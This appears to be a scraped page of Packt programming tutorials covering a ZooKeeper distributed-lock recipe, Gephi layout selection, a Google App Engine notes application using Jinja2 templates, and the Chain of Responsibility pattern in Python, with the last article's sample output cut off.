To build a distributed lock with ZooKeeper, a persistent znode is designated to be the main lock-znode. Client processes that want to acquire the lock will create an ephemeral znode with a sequential flag set under the lock-znode. The crux of the algorithm is that the lock is owned by the client process whose child znode has the lowest sequence number. ZooKeeper guarantees the order of the sequence number, as sequence znodes are numbered in a monotonically increasing order. Suppose there are three znodes under the lock-znode: l1, l2, and l3. The client process that created l1 will be the owner of the lock. If the client wants to release the lock, it simply deletes l1, and then the owner of l2 will be the lock owner, and so on.

The pseudocode for the algorithm to implement a distributed lock service with ZooKeeper is shown here:

Let the parent lock node be represented by a persistent znode, /_locknode_, in the ZooKeeper tree.

Phase 1: Acquire a lock with the following steps:

1. Call the create("/_locknode_/lock-", CreateMode=EPHEMERAL_SEQUENTIAL) method.
2. Call the getChildren("/_locknode_", false) method on the lock node. Here, the watch flag is set to false, as otherwise, it can lead to a herd effect.
3. If the znode created by the client in step 1 has the lowest sequence number suffix, then the client is the owner of the lock, and it exits the algorithm.
4. Call the exists("/_locknode_/, True) method.
5. If the exists() method returns false, go to step 2. If the exists() method returns true, wait for notifications for the watch event set in step 4.

Phase 2: Release a lock as follows:

1. The client holding the lock deletes the node, thereby triggering the next client in line to acquire the lock.
2. The client that created the next higher sequence node will be notified and hold the lock. The watch for this event was set in step 4 of Phase 1: Acquire a lock.

Although this is not recommended in a distributed system with a large number of clients because of the herd effect, other clients that also need to know about a change of lock ownership could set a watch on the /_locknode_ lock node for events of the NodeChildrenChanged type and determine the current owner.

If there was a partial failure in the creation of the znode due to connection loss, it's possible that the client won't be able to correctly determine whether it successfully created the child znode. To resolve such a situation, the client can store its session ID in the znode data field or even as a part of the znode name itself. As a client retains the same session ID after a reconnect, it can easily determine whether the child znode was created by it by looking at the session ID.

Creating an ephemeral znode prevents a potential deadlock that might arise when a client dies while holding a lock. Because an ephemeral znode is deleted when the session times out or expires, ZooKeeper will delete the znode created by the dead client, and the algorithm runs as usual. However, if the client hangs for some reason but the ZooKeeper session is still active, then we might get into a deadlock.
This can be solved by having a monitor client that triggers an alarm when the lock holding time for a client crosses a predefined timeout.

The ZooKeeper distribution ships with C and Java language implementations of a distributed lock in the recipes folder. The recipe implements the algorithm you have learned so far and also takes into account the problems associated with partial failure and the herd effect.

The previous recipe of a mutually exclusive lock can be modified to implement a shared lock as well. Readers can find the algorithm and pseudocode for a shared lock using ZooKeeper in the documentation at http://zookeeper.apache.org/doc/r3.4.6/recipes.html#Shared+Locks. More ZooKeeper recipes are available at: http://zookeeper.apache.org/doc/trunk/recipes.html

Summary

In this article, we read about the fundamentals of Apache ZooKeeper, how to program it, and how to implement common distributed data structures with ZooKeeper. For more details on Apache ZooKeeper, please visit its project page.

Resources for Article:

Further resources on this subject: Creating an Apache JMeter™ test workbench [article]; Apache Maven and m2eclipse [article]; Coverage with Apache Karaf Pax Exam tests [article]
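To make the lock recipe from this article a little more concrete, the decision each client takes after listing the children of /_locknode_ can be written as a pure function. This is a sketch under stated assumptions: lock_decision and sequence_of are hypothetical helper names, child names are assumed to end in a zero-padded sequence number, and each waiting client is assumed to watch the znode immediately ahead of its own, as the release phase implies.

```python
def sequence_of(name):
    """Extract the numeric suffix from a name such as lock-0000000003."""
    return int(name.rsplit("-", 1)[1])


def lock_decision(children, my_node):
    """One pass of the acquire phase.

    Returns (owns_lock, node_to_watch). The owner watches nothing; every
    other client watches only its immediate predecessor, which is what
    avoids the herd effect.
    """
    ordered = sorted(children, key=sequence_of)
    position = ordered.index(my_node)
    if position == 0:
        return True, None
    return False, ordered[position - 1]


children = ["lock-0000000002", "lock-0000000000", "lock-0000000001"]
owner = lock_decision(children, "lock-0000000000")
waiter = lock_decision(children, "lock-0000000002")
```

Here the client that created lock-0000000000 owns the lock, while the client that created lock-0000000002 waits on lock-0000000001 only. When a watched znode disappears, the client lists the children again and repeats the decision, since the predecessor may have vanished because its session expired rather than because it released the lock.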


Packt

05 Feb 2015

11 min read

Selecting the Layout

In this article by Ken Cherven, author of the book Mastering Gephi Network Visualization, we will learn how to select the most appropriate layout types based on the characteristics of your network data. (For more resources related to this topic, see here.)

Assessing your graphing needs

Now that you have seen the broad array of available layout options and a bit of their respective capabilities, it is time to step back and reconsider what story you want to tell through the data. As you have just seen, there are many directions you can take within Gephi, and there is no absolute standard for right or wrong in your layout selection. However, there are some simple guidelines that can be followed to help narrow the choices.

If you are experienced with Gephi or another network analysis tool, you might wish to dive directly into the next section and begin assessing each layout type using your very own dataset; I will not attempt to convince you otherwise. This is a great way to quickly learn the basics of every layout offering and can be a great experience. On the other hand, if you wish to take a more focused approach, I will offer you a brief checklist of considerations that might help to narrow your pool of layout candidates, allowing you to spend more time with those likely to provide the best results. Think of this as akin to shopping for clothes: you could try on every type of clothing on the rack, or you can quickly narrow your choices based on certain criteria such as body type, complementary colors, preferred styles, and so on. So let's have a look at some of the basic points to consider while shopping for an appropriate layout:

What is the goal of your analysis? Are you attempting to show complementarity within the network, as in the relationships between nodes or sets of nodes, or is the goal to display divisions within the data? Does geography play a critical role in the network? Perhaps you are seeking to sort or rank networks based on some attribute within the data.
Each of these factors can play a determining role in which layout algorithm is best for your specific network.

Is the dataset small, medium, or large? Admittedly, this is a subjective criterion, but we can put some general bounds around these definitions. In my mind, if the number of nodes is measured in tens or dozens, then this is likely a small dataset that can be easily displayed in a conventional space, such as the Gephi workspace window or a letter-sized sheet of paper for a printed version. If, however, the nodes run into the hundreds, we are now moving away from a very simple network and potentially reducing the number of practical layout options. When the number of nodes in a network moves into the thousands and beyond, we have what can practically be considered a large network, at least for display considerations. With datasets of this scope, additional display considerations come into play, such as judicious use of filters, layers, and interactivity.

How densely connected is the network? In our previous example using the power grid data, we had a fairly large dataset numbering in the thousands, but one that was not highly connected, at least as compared to social networks. In that case, we might have an easier time selecting and applying an effective layout, while the highly connected nature of social networks presents an additional challenge.

Does the network exhibit certain measurable behaviors such as clustering and homophily? In some cases, we might not know this until the network has been visually and programmatically analyzed, but in others we might already know that the data is likely to cluster based on certain attributes that influence the network structure, including geographic proximity, alumni networks, professional associations, and a host of other possibilities. Knowing some of these in advance might help guide us either toward or away from specific layout types.

Will the network be displayed on a single level, or will it be bipartite or multipartite?
In this case, some networks might be hierarchical, with individuals (for example) linking only to an organization, and not to other individuals in the network. There are many instances where we will wish to present hierarchical networks in this fashion. This could be used to display corporate structures, academic hierarchies, player to team relationships, and so on, and requires some different considerations than networks without this structure.

Does the data have a temporal element? In simple terms, will the story be told more effectively by viewing network changes over time? This can be very effective in showing diffusion/contagion patterns, random growth, and simple shifts in behavior within a network. For example, were Thomas and James friends at T1, but no longer so at T3 (where T equals time)? If our data has a specific time element, this leads us to identify layouts that will best display these changes and tell an effective story.

Will the network be interactive on the user end, or will it be static? This can ultimately lead to a different layout selection when users have the ability to navigate a network via the Web.

You might have additional considerations, including the speed of the layout algorithm, but the preceding list should help you to narrow the list of practical layouts, allowing you to test the remaining candidates.

Actual example – the Miles Davis network

Let's walk through a process following the preceding guidelines, applying them to a project I created previously. This will help us migrate from the theoretical constructs above to a practical application of many of these principles. The project I'll use as our example traces the studio albums recorded by the legendary jazz trumpeter, Miles Davis (48 in all). Here are the details for this project, following the above progression.

Analysis goal

The goal of the analysis was to inform viewers, who might or might not be jazz fans, about the remarkable, far-reaching recording legacy of Miles Davis.
Since the career of Davis moved through many stages, he crossed paths with and employed an incredible number of artists across a diverse range of instruments that ranged far beyond the normal jazz instrumentation. Therefore, part of the goal of the analysis was to expose viewers to this great diversity, and give them the ability to see changes and patterns within the scope of his career.

Dataset parameters

The dataset in this case is not insignificant. While 48 albums would represent a small network if left on its own, we know from the data that there are typically at least four musicians per recording, and often far more, numbering into the 20s in some cases. Many of the musicians are represented on multiple recordings, but there is still a multiplicative impact on the size of the network, which turns out to have about 350 nodes. While this certainly doesn't rival the enormous datasets often seen in social networks, it is large enough that we need to be thoughtful about the layout and how users will interact with the project. Here is a look at some of the underlying data for the nodes:

Figure: Miles Davis nodes

Notice that the nodes are a combination of an individual musician and a specific instrument, since so many of these musicians play a second (or even third) instrument. The data is then grouped by instrument, which allows you to partition and custom color the data. Now, the following figure illustrates a partial view of the edge data:

Figure: Miles Davis data edges

In the preceding screenshot, we see only album level connections, with Miles Davis as the source and each album as the target, although the edges are left undirected. If we move further into the edge data, we can see how the network is structured a bit more clearly:

Figure: Miles Davis data edge details

This data shows some of the musician level connections to specific recordings, as well as the instrument played on that album.
This completes the basic structure of the network, as each musician will have an edge connecting them to any and all albums they played on. So this gives us a basic understanding of how the data will be represented in the network—Miles at the core, all albums at a second level, followed by every contributing musician at a tertiary level. Network density We have all seen many highly connected networks with edges crossing between nodes or groups within a graph that become virtually impenetrable for the viewer. Fortunately, this was not a major concern with this network, given its relatively modest size, but it could still play a role in the final layout selection. As always, the goal is to provide clarity and understanding, regardless of the relative size of the network, so minimizing visual clutter is always a priority. Network behaviors Examining the network behaviors can be an interesting exercise, as it often leads us to findings that were not necessarily anticipated. In the case of this project, we know from viewing the data that Miles played with certain musicians on a frequent basis, but would then often play with an entirely new group during his next phase, before switching yet again to a completely unrelated group of musicians. In other words, there were multiple aggregations of musicians who only occasionally intersected with one another. This is very nearly a proxy for homophily, with distinct clusters connected to each other through a single node (Miles Davis in this case) or perhaps a small subset of network members who act as bridges between various clusters. Based on this knowledge, we would anticipate a highly clustered network with a significant level of connectedness within a given cluster, and a limited set of connections between clusters. The next decision to make was how best to display this network. 
Network display We just saw the underlying data structure, which had a bipartite nature to it, with each musician connecting to one or more albums, rather than to other musicians. Given this type of network, we want to select a layout that eases our ability to see not only the connections between Miles Davis and each recording, but also from each album to all of the participating musicians. This will require a layout that provides enough empty space to make for clear viewing, but also one that manages to combine this with a minimal number of edge crossings. Remember that many of these musicians played on multiple recordings, so they must be positioned in proximity to several albums at the same time, without adding to a cluttered look. After testing several layouts, some of which simply didn't work effectively with the above two needs, I settled on the ARF algorithm for its visual clarity to display this particular network. The ability to see patterns within the network, even prior to adding interactivity, is a plus; if the network passes that test, it should be very effective once users interact with the information. Temporal elements Another interesting aspect of the network that could have been utilized was the timeline for the recordings. With more than four decades of recordings, this could have provided a wealth of information about changes over time in the musicians' network and instrumentation on each album. This element was not highlighted, but it does make its presence felt in the final network, with albums from one period with a consistent cast of musicians occupying one sector of the graph, while other types of albums with many infrequently used musicians land in another area. Interactivity The final decision was whether to make the network interactive, giving users the ability to learn more through self-navigation of the graph. 
This was considered important from the very start, so that the viewers could see not only the body of work represented by the 48 recordings, but also the evolution of which musicians were involved and the wide array of instruments used as Miles' career evolved.

After each of these considerations was evaluated, and through a period of testing the network using multiple layouts, I settled on the ARF force-directed layout coupled with the Sigma.js plugin for interactivity. Here's a look at the final output, which includes options using the Sigma.js plugin:

Figure: The Miles Davis network graph

The link to the project can be found at http://visual-baseball.com/gephi/jazz/miles_davis/.

I hope this example helps to generate some ideas or at least opens up the possibilities for what Gephi is capable of creating, and that the process illustrated earlier helps to provide at least a foundation for your own work.

Summary

In this article, you learned how to select the most appropriate layout types based on the characteristics of your network data.

Resources for Article:

Further resources on this subject: Data visualization [article]; Visualization as a Tool to Understand Data [article]; Creating Network Graphs with Gephi [article]


Packt

05 Feb 2015

11 min read

Google App Engine

In this article by Massimiliano Pippi, author of the book Python for Google App Engine, you will learn how to write a web application and see the platform in action. Web applications commonly provide a set of features such as user authentication and data storage. App Engine provides the services and tools needed to implement such features. (For more resources related to this topic, see here.)

In this article, we will look at details of the webapp2 framework, how to authenticate users, storing data on Google Cloud Datastore, and building HTML pages using templates.

Experimenting on the Notes application

To better explore App Engine and Cloud Platform capabilities, we need a real-world application to experiment on; something that's not trivial to write, with a reasonable list of requirements. A good candidate is a note-taking application; we will name it Notes. Notes enables users to add, remove, and modify a list of notes; a note has a title and a body of text. Users can only see their personal notes, so they must authenticate before using the application. The main page of the application will show the list of notes for logged-in users and a form to add new ones.

The code from the helloworld example is a good starting point. We can simply change the name of the root folder and the application field in the app.yaml file to match the new name we chose for the application, or we can start a new project from scratch named notes.
Authenticating users

The first requirement for our Notes application is to show the home page only to users who are logged in and to redirect others to the login form; the users service provided by App Engine is exactly what we need, and adding it to our MainHandler class is quite simple:

    import webapp2
    from google.appengine.api import users

    class MainHandler(webapp2.RequestHandler):
        def get(self):
            # None means that nobody is logged in
            user = users.get_current_user()
            if user is not None:
                self.response.write('Hello Notes!')
            else:
                # Come back to the current page after a successful login
                login_url = users.create_login_url(self.request.uri)
                self.redirect(login_url)

    app = webapp2.WSGIApplication([
        ('/', MainHandler)
    ], debug=True)

The users package we import on the second line of the previous code provides access to the users service functionalities. Inside the get() method of the MainHandler class, we first check whether the user visiting the page has logged in or not. If they have, the get_current_user() method returns an instance of the User class provided by App Engine and representing an authenticated user; otherwise, it returns None. If the user is valid, we provide the response as we did before; otherwise, we redirect them to the Google login form. The URL of the login form is returned by the create_login_url() method, and we call it, passing as a parameter the URL we want to redirect users to after a successful authentication. In this case, we want to redirect users to the same URL they are visiting, provided by webapp2 in the self.request.uri property. The webapp2 framework also provides handlers with a redirect() method we can use to conveniently set the right status and location properties of the response object so that the client browsers will be redirected to the login page.

HTML templates with Jinja2

Web applications provide rich and complex HTML user interfaces, and Notes is no exception, but so far, the response objects in our application have contained just small pieces of text.
We could include HTML tags as strings in our Python modules and write them in the response body, but we can imagine how easily the code could become messy and hard to maintain. We need to completely separate the Python code from HTML pages, and that's exactly what a template engine does. A template is a piece of HTML code living in its own file and possibly containing additional, special tags; with the help of a template engine, from the Python script, we can load this file, properly parse special tags, if any, and return valid HTML code in the response body. App Engine includes in the Python runtime a well-known template engine: the Jinja2 library.

To make the Jinja2 library available to our application, we need to add this code to the app.yaml file under the libraries section:

    libraries:
    - name: webapp2
      version: "2.5.2"
    - name: jinja2
      version: latest

We can put the HTML code for the main page in a file called main.html inside the application root. We start with a very simple page:

    <!DOCTYPE html>
    <html>
    <head lang="en">
      <meta charset="UTF-8">
      <title>Notes</title>
    </head>
    <body>
      <div class="container">
        <h1>Welcome to Notes!</h1>
        <p>
          Hello, <b>{{user}}</b> - <a href="{{logout_url}}">Logout</a>
        </p>
      </div>
    </body>
    </html>

Most of the content is static, which means that it will be rendered as standard HTML as we see it, but there is a part that is dynamic and whose content depends on which data will be passed at runtime to the rendering process. This data is commonly referred to as the template context.

What has to be dynamic is the username of the current user and the link used to log out from the application. The HTML code contains two special elements written in the Jinja2 template syntax, {{user}} and {{logout_url}}, that will be substituted before the final output occurs.
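To build some intuition for what "substituting the template context" means, here is a deliberately tiny stand-in written with only the Python 3 standard library. It is not Jinja2 and supports nothing beyond {{name}} placeholders; the render function and the sample values are hypothetical and exist only for illustration.

```python
import re

# Matches {{name}} with optional spaces inside the braces.
PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render(template_text, context):
    """Replace each {{name}} with the matching context value.

    Names missing from the context become an empty string in this sketch.
    """
    return PLACEHOLDER.sub(
        lambda match: str(context.get(match.group(1), "")),
        template_text)


page = '<p>Hello, <b>{{user}}</b> - <a href="{{logout_url}}">Logout</a></p>'
html = render(page, {"user": "alice", "logout_url": "/logout"})
```

The static markup passes through untouched, and only the two placeholders change. A real template engine adds much more on top of this idea, such as conditionals, loops, and escaping.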
Back to the Python script; we need to add the code to initialize the template engine before the MainHandler class definition:

    import os
    import jinja2

    # Load templates from the directory that contains this script
    jinja_env = jinja2.Environment(
        loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))

The environment instance stores engine configuration and global objects, and it's used to load template instances; in our case, instances are loaded from HTML files on the filesystem in the same directory as the Python script.

To load and render our template, we add the following code to the MainHandler.get() method:

    class MainHandler(webapp2.RequestHandler):
        def get(self):
            user = users.get_current_user()
            if user is not None:
                logout_url = users.create_logout_url(self.request.uri)
                # Values made available to the template
                template_context = {
                    'user': user.nickname(),
                    'logout_url': logout_url,
                }
                template = jinja_env.get_template('main.html')
                self.response.out.write(
                    template.render(template_context))
            else:
                login_url = users.create_login_url(self.request.uri)
                self.redirect(login_url)

Similar to how we get the login URL, the create_logout_url() method provided by the users service returns the absolute URI to the logout procedure, which we assign to the logout_url variable.

We then create the template_context dictionary that contains the context values we want to pass to the template engine for the rendering process. We assign the nickname of the current user to the user key in the dictionary and the logout URL string to the logout_url key.

The get_template() method from the jinja_env instance takes the name of the file that contains the HTML code and returns a Jinja2 template object. To obtain the final output, we call the render() method on the template object, passing in the template_context dictionary, whose values are accessed by specifying their respective keys in the HTML file with the template syntax elements {{user}} and {{logout_url}}.
Handling forms

The main page of the application is supposed to list all the notes that belong to the current user, but there isn't any way to create such notes at the moment. We need to display a web form on the main page so that users can submit details and create a note.

To display a form to collect data and create notes, we put the following HTML code right below the username and the logout link in the main.html template file:

    {% if note_title %}
    <p>Title: {{note_title}}</p>
    <p>Content: {{note_content}}</p>
    {% endif %}
    <h4>Add a new note</h4>
    <form action="" method="post">
      <div class="form-group">
        <label for="title">Title:</label>
        <input type="text" id="title" name="title" />
      </div>
      <div class="form-group">
        <label for="content">Content:</label>
        <textarea id="content" name="content"></textarea>
      </div>
      <div class="form-group">
        <button type="submit">Save note</button>
      </div>
    </form>

Before showing the form, a message is displayed only when the template context contains a variable named note_title. To do this, we use an if statement, executed between the {% if note_title %} and {% endif %} delimiters; similar delimiters are used to perform for loops or assign values inside a template.

The action property of the form tag is empty; this means that upon form submission, the browser will perform a POST request to the same URL, which in this case is the home page URL.
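It can help to see roughly what travels over the wire when the form above is submitted. The following sketch uses only the Python 3 standard library, not webapp2 or App Engine. It assumes the browser's default form encoding (application/x-www-form-urlencoded), and encode_form and get_field are hypothetical helper names chosen for this illustration.

```python
from urllib.parse import parse_qs, urlencode


def encode_form(fields):
    """Encode form fields the way a browser does for a default POST body."""
    return urlencode(fields)


def get_field(body, name, default=""):
    """Return the first value submitted for a field, or a default if absent."""
    values = parse_qs(body).get(name)
    return values[0] if values else default


# The two inputs of the form are named "title" and "content".
body = encode_form({"title": "Shopping list", "content": "Milk & eggs"})
title = get_field(body, "title")
content = get_field(body, "content")
```

Spaces and reserved characters are escaped in the request body and restored when the server decodes it, so the handler sees the text exactly as the user typed it.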
As our WSGI application maps the home page to the MainHandler class, we need to add a method to this class so that it can handle POST requests:

    class MainHandler(webapp2.RequestHandler):
        def get(self):
            user = users.get_current_user()
            if user is not None:
                logout_url = users.create_logout_url(self.request.uri)
                template_context = {
                    'user': user.nickname(),
                    'logout_url': logout_url,
                }
                template = jinja_env.get_template('main.html')
                self.response.out.write(
                    template.render(template_context))
            else:
                login_url = users.create_login_url(self.request.uri)
                self.redirect(login_url)

        def post(self):
            user = users.get_current_user()
            if user is None:
                self.error(401)
                # Stop here; otherwise user.nickname() would fail on None
                return
            logout_url = users.create_logout_url(self.request.uri)
            template_context = {
                'user': user.nickname(),
                'logout_url': logout_url,
                # Values submitted through the HTML form
                'note_title': self.request.get('title'),
                'note_content': self.request.get('content'),
            }
            template = jinja_env.get_template('main.html')
            self.response.out.write(
                template.render(template_context))

When the form is submitted, the handler is invoked and the post() method is called. We first check whether a valid user is logged in; if not, we respond with an HTTP 401: Unauthorized error and return without serving any content in the response body.

Since the HTML template is the same one served by the get() method, we still need to add the logout URL and the username to the context. In this case, we also store the data coming from the HTML form in the context. To access the form data, we call the get() method on the self.request object. The last three lines are boilerplate code to load and render the home page template.
We can move this code into a separate method to avoid duplication:

    def _render_template(self, template_name, context=None):
        if context is None:
            context = {}
        template = jinja_env.get_template(template_name)
        return template.render(context)

In the handler class, we will then use something like this to output the template rendering result:

    self.response.out.write(
        self._render_template('main.html', template_context))

We can try to submit the form and check whether the note title and content are actually displayed above the form.

Summary

Thanks to App Engine, we have already implemented a rich set of features with relatively little effort so far. We have discovered some more details about the webapp2 framework and its capabilities, implementing a nontrivial request handler. We have learned how to use the App Engine users service to provide user authentication. We have delved into some fundamental details of Datastore, and now we know how to structure data in grouped entities and how to effectively retrieve data with ancestor queries. In addition, we have created an HTML user interface with the help of the Jinja2 template library, learning how to serve static content such as CSS files.

Resources for Article:

Further resources on this subject: Machine Learning in IPython with scikit-learn [Article]; Introspecting Maya, Python, and PyMEL [Article]; Driving Visual Analyses with Automobile Data (Python) [Article]


Packt

05 Feb 2015

10 min read

Advanced Programming and Control


Packt

05 Feb 2015

12 min read

The Chain of Responsibility Pattern


In this article by Sakis Kasampalis, author of the book Mastering Python Design Patterns, we will see a detailed description of the Chain of Responsibility design pattern with the help of a real-life example as well as a software example. Also, its use cases and implementation are discussed. (For more resources related to this topic, see here.) When developing an application, most of the time we know which method should satisfy a particular request in advance. However, this is not always the case. For example, we can think of any broadcast computer network, such as the original Ethernet implementation [j.mp/wikishared]. In broadcast computer networks, all requests are sent to all nodes (broadcast domains are excluded for simplicity), but only the nodes that are interested in a sent request process it. All computers that participate in a broadcast network are connected to each other using a common medium such as the cable that connects the three nodes in the following figure: If a node is not interested or does not know how to handle a request, it can perform the following actions: Ignore the request and do nothing Forward the request to the next node The way in which the node reacts to a request is an implementation detail. However, we can use the analogy of a broadcast computer network to understand what the chain of responsibility pattern is all about. The Chain of Responsibility pattern is used when we want to give a chance to multiple objects to satisfy a single request, or when we don't know which object (from a chain of objects) should process a specific request in advance. The principle is the same as the following: There is a chain (linked list, tree, or any other convenient data structure) of objects. We start by sending a request to the first object in the chain. The object decides whether it should satisfy the request or not. The object forwards the request to the next object. This procedure is repeated until we reach the end of the chain. 
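The steps above can be sketched in a few lines of Python. This is only an illustration of the principle, not code from the book: the Node class, its interests set, and the node names are all hypothetical. As in the broadcast-network analogy, every node sees the request, only the interested ones process it, and each node forwards the request to its successor until the end of the chain is reached.

```python
class Node:
    """One link in the chain (hypothetical name); successor is the next node or None."""

    def __init__(self, name, interests, successor=None):
        self.name = name
        self.interests = set(interests)
        self.successor = successor

    def receive(self, request, processed_by=None):
        if processed_by is None:
            processed_by = []
        # The node decides whether it should satisfy the request
        if request in self.interests:
            processed_by.append(self.name)
        # The node forwards the request to the next node, if there is one
        if self.successor is not None:
            return self.successor.receive(request, processed_by)
        # End of the chain: report which nodes processed the request
        return processed_by


# Build the chain back to front: editor -> logger -> printer
printer = Node('printer', ['print'])
logger = Node('logger', ['print', 'save'], successor=printer)
head = Node('editor', ['save'], successor=logger)

# The client only talks to the head of the chain
print(head.receive('print'))  # ['logger', 'printer']
print(head.receive('save'))   # ['editor', 'logger']
print(head.receive('quit'))   # []
```

Note that the client never holds a reference to logger or printer when sending a request; it only needs the head.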
At the application level, instead of talking about cables and network nodes, we can focus on objects and the flow of a request. The following figure, courtesy of www.sourcemaking.com [j.mp/smchain], shows how the client code sends a request to all processing elements (also known as nodes or handlers) of an application:

Note that the client code only knows about the first processing element, instead of having references to all of them, and each processing element only knows about its immediate next neighbor (called the successor), not about every other processing element. This is usually a one-way relationship, which in programming terms means a singly linked list in contrast to a doubly linked list; a singly linked list does not allow navigation in both directions, while a doubly linked list does. This chain organization is used for a good reason. It achieves decoupling between the sender (client) and the receivers (processing elements) [GOF95, page 254].

A real-life example

ATMs and, in general, any kind of machine that accepts/returns banknotes or coins (for example, a snack vending machine) use the chain of responsibility pattern. There is always a single slot for all banknotes, as shown in the following figure, courtesy of www.sourcemaking.com:

When a banknote is dropped, it is routed to the appropriate receptacle. When it is returned, it is taken from the appropriate receptacle [j.mp/smchain], [j.mp/c2chain]. We can think of the single slot as the shared communication medium and the different receptacles as the processing elements. The result contains cash from one or more receptacles. For example, in the preceding figure, we see what happens when we request $175 from the ATM.

A software example

I tried to find some good examples of Python applications that use the Chain of Responsibility pattern but I couldn't, most likely because Python programmers don't use this name.
So, my apologies, but I will use other programming languages as a reference. The servlet filters of Java are pieces of code that are executed before an HTTP request arrives at a target. When using servlet filters, there is a chain of filters. Each filter performs a different action (user authentication, logging, data compression, and so forth), and either forwards the request to the next filter until the chain is exhausted, or it breaks the flow if there is an error (for example, the authentication failed three consecutive times) [j.mp/soservl]. Apple's Cocoa and Cocoa Touch frameworks use Chain of Responsibility to handle events. When a view receives an event that it doesn't know how to handle, it forwards the event to its superview. This goes on until a view is capable of handling the event or the chain of views is exhausted [j.mp/chaincocoa]. Use cases By using the Chain of Responsibility pattern, we give a chance to a number of different objects to satisfy a specific request. This is useful when we don't know which object should satisfy a request in advance. An example is a purchase system. In purchase systems, there are many approval authorities. One approval authority might be able to approve orders up to a certain value, let's say $100. If the order is more than $100, the order is sent to the next approval authority in the chain that can approve orders up to $200, and so forth. Another case where Chain of Responsibility is useful is when we know that more than one object might need to process a single request. This is what happens in an event-based programming. A single event such as a left mouse click can be caught by more than one listener. It is important to note that the Chain of Responsibility pattern is not very useful if all the requests can be taken care of by a single processing element, unless we really don't know which element that is. The value of this pattern is the decoupling that it offers. 
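To make the purchase-system use case concrete, here is a minimal sketch of an approval chain. The Approver class, the titles, and the limits beyond the $100 and $200 mentioned above are illustrative assumptions, not part of the book's code. Unlike an event that several listeners may catch, an order stops at the first authority that can approve it.

```python
class Approver:
    """An approval authority (hypothetical class) that can approve orders up to `limit`."""

    def __init__(self, title, limit, successor=None):
        self.title = title
        self.limit = limit
        self.successor = successor

    def approve(self, amount):
        # Satisfy the request if it is within this authority's limit
        if amount <= self.limit:
            return '{} approved ${}'.format(self.title, amount)
        # Otherwise pass the order to the next authority in the chain
        if self.successor is not None:
            return self.successor.approve(amount)
        # The chain is exhausted and nobody could approve the order
        return 'nobody can approve ${}'.format(amount)


director = Approver('Director', 200)
manager = Approver('Manager', 100, successor=director)

# The client only knows the first approval authority
print(manager.approve(80))   # Manager approved $80
print(manager.approve(150))  # Director approved $150
print(manager.approve(500))  # nobody can approve $500
```

Adding a new authority with a higher limit only requires linking it as the director's successor; the client code that calls manager.approve() stays the same.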
Instead of having a many-to-many relationship between a client and all processing elements (and the same is true regarding the relationship between a processing element and all other processing elements), a client only needs to know how to communicate with the start (head) of the chain. The following figure demonstrates the difference between tight and loose coupling. The idea behind loosely coupled systems is to simplify maintenance and make it easier for us to understand how they function [j.mp/loosecoup]:

Implementation

There are many ways to implement Chain of Responsibility in Python, but my favorite implementation is the one by Vespe Savikko [j.mp/savviko]. Vespe's implementation uses dynamic dispatching in a Pythonic style to handle requests [j.mp/ddispatch]. Let's implement a simple event-based system using Vespe's implementation as a guide. The following is the UML class diagram of the system:

The Event class describes an event. We'll keep it simple, so in our case an event has only a name:

    class Event:
        def __init__(self, name):
            self.name = name

        def __str__(self):
            return self.name

The Widget class is the core class of the application. The parent aggregation shown in the UML diagram indicates that each widget can have a reference to a parent object, which, by convention, we assume is a Widget instance. Note, however, that according to the rules of inheritance, an instance of any of the subclasses of Widget (for example, an instance of MsgText) is also an instance of Widget. The default value of parent is None:

    class Widget:
        def __init__(self, parent=None):
            self.parent = parent

The handle() method uses dynamic dispatching through hasattr() and getattr() to decide who is the handler of a specific request (event). If the widget that is asked to handle an event does not support it, there are two fallback mechanisms. If the widget has a parent, then the handle() method of the parent is executed.
If the widget has no parent but has a handle_default() method, handle_default() is executed:

        def handle(self, event):
            handler = 'handle_{}'.format(event)
            if hasattr(self, handler):
                method = getattr(self, handler)
                method(event)
            elif self.parent:
                self.parent.handle(event)
            elif hasattr(self, 'handle_default'):
                self.handle_default(event)

At this point, you might have realized why the Widget and Event classes are only associated (no aggregation or composition relationships) in the UML class diagram. The association is used to show that the Widget class "knows" about the Event class but does not have any strict references to it, since an event needs to be passed only as a parameter to handle().

MainWindow, MsgText, and SendDialog are all widgets with different behaviors. Not all three widgets are expected to be able to handle the same events, and even if they can handle the same event, they might behave differently. MainWindow can handle only the close and default events:

    class MainWindow(Widget):
        def handle_close(self, event):
            print('MainWindow: {}'.format(event))

        def handle_default(self, event):
            print('MainWindow Default: {}'.format(event))

SendDialog can handle only the paint event:

    class SendDialog(Widget):
        def handle_paint(self, event):
            print('SendDialog: {}'.format(event))

Finally, MsgText can handle only the down event:

    class MsgText(Widget):
        def handle_down(self, event):
            print('MsgText: {}'.format(event))

The main() function shows how we can create a few widgets and events, and how the widgets react to those events. All events are sent to all the widgets. Note the parent relationship of each widget. The sd object (an instance of SendDialog) has as its parent the mw object (an instance of MainWindow). However, not all objects need to have a parent that is an instance of MainWindow.
For example, the msg object (an instance of MsgText) has the sd object as a parent:

    def main():
        mw = MainWindow()
        sd = SendDialog(mw)
        msg = MsgText(sd)

        for e in ('down', 'paint', 'unhandled', 'close'):
            evt = Event(e)
            print('\nSending event -{}- to MainWindow'.format(evt))
            mw.handle(evt)
            print('Sending event -{}- to SendDialog'.format(evt))
            sd.handle(evt)
            print('Sending event -{}- to MsgText'.format(evt))
            msg.handle(evt)

The following is the full code of the example (chain.py):

    class Event:
        def __init__(self, name):
            self.name = name

        def __str__(self):
            return self.name


    class Widget:
        def __init__(self, parent=None):
            self.parent = parent

        def handle(self, event):
            handler = 'handle_{}'.format(event)
            if hasattr(self, handler):
                method = getattr(self, handler)
                method(event)
            elif self.parent:
                self.parent.handle(event)
            elif hasattr(self, 'handle_default'):
                self.handle_default(event)


    class MainWindow(Widget):
        def handle_close(self, event):
            print('MainWindow: {}'.format(event))

        def handle_default(self, event):
            print('MainWindow Default: {}'.format(event))


    class SendDialog(Widget):
        def handle_paint(self, event):
            print('SendDialog: {}'.format(event))


    class MsgText(Widget):
        def handle_down(self, event):
            print('MsgText: {}'.format(event))


    def main():
        mw = MainWindow()
        sd = SendDialog(mw)
        msg = MsgText(sd)

        for e in ('down', 'paint', 'unhandled', 'close'):
            evt = Event(e)
            print('\nSending event -{}- to MainWindow'.format(evt))
            mw.handle(evt)
            print('Sending event -{}- to SendDialog'.format(evt))
            sd.handle(evt)
            print('Sending event -{}- to MsgText'.format(evt))
            msg.handle(evt)


    if __name__ == '__main__':
        main()

Executing chain.py gives us the following results:

    >>> python3 chain.py

    Sending event -down- to MainWindow
    MainWindow Default: down
    Sending event -down- to SendDialog
